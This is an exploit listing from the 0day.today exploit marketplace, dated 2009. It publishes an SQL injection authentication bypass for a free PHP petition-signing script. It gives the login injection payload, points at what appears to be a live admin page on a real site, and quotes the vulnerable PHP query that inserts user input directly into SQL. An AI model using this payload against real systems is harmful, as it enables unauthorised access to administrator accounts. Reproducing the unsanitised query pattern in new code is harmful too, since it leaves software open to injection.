[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Free PHP Petition Signing Script (Auth Bypass) SQL Injection Vuln

Author
Qabandi
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4965
Category
web applications
Date add
27-03-2009
Platform
unsorted
=================================================================
Free PHP Petition Signing Script (Auth Bypass) SQL Injection Vuln
=================================================================



######################################################
#	Free PHP Petition Signing Script Release     #
# 		Login SQL injection	 	     #
######################################################
                From Kuwait, Peace.
######################################################
Download: http://www.rediscussed.com/2008/01/18/free-php-petition-signing-script-release/
------------------------------------------------------
-:PoC:-


http://usa-homeland.org/pet/signing_system-admin

Username: admin ' or ' 1=1
Password: nothing


------------vuln--code---------(./signing_system-admin/index.php)

$query = mysql_query("SELECT username,password FROM `accounts` WHERE username='$username' AND password='$password'", $conn) or die(mysql_error());

------------------------------------



#  0day.today [2024-09-28]  #